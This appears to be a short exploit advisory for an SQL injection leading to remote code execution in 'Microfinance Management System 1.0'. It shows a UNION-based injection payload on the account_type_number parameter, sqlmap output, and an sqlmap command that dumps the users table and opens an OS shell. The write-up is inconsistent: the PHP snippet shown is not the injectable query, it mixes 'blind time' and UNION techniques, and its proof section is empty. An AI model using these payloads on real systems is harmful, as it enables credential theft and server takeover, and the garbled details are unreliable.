# Title: Microfinance Management System 1.0 SQLi To Rce
\n# Author: Hejap Zairy
\n# Date: 24.07.2022
\n# Vendor: https:\/\/www.sourcecodester.com\/php\/14822\/microfinance-management-system.html
\n# Software: https:\/\/www.sourcecodester.com\/sites\/default\/files\/download\/oretnom23\/mims_0.zip
\n# Reference: https:\/\/github.com\/Matrix07ksa
\n# Tested on: Windows, MySQL, Apache<\/p>\n
#vulnerability Code php<\/p>\n
“`php
\n<?php
\n$sql = “SELECT count(*) AS total_account FROM account_type”;
\n$result = mysqli_query($conn, $sql);
\n$data = mysqli_fetch_assoc($result);
\n?>
\n}
\n“`<\/p>\n
#Status: CRITICAL
\n“`
\nGET parameter ‘account_type_number’ is vulnerable. Do you want to keep testing the others (if any)? [y\/N] y
\nsqlmap identified the following injection point(s) with a total of 147 HTTP(s) requests:
\n—
\nParameter: account_type_number (GET)
\nType: UNION query
\nTitle: MySQL UNION query (random number) – 3 columns
\nPayload: account_type_number=-6015′ UNION ALL SELECT 7366,CONCAT(0x716b626b71,0x4268666c6b715274794a58534f487366546e5379414951584a684459764f424451536f5a707a6a6a,0x7170707a71),7366#
\n—<\/p>\n
“`
\n#SQLi Time to Rce
\n#\u064fExploit<\/p>\n
sqlmap -u ‘http:\/\/0day.gov\/mims\/updateaccount_type.php?account_type_number=6015’ –hex –time-sec=17 –dbms=mysql –technique=u –random-agent –eta -p account_type_number -D mims -T users –dump –os-shell<\/p>\n
# Description:
\nThe Blind Time SQLi vulnerability was converted to rce due to the permissions I have in the database and it was privesc<\/p>\n
# Proof and Exploit:<\/p>\n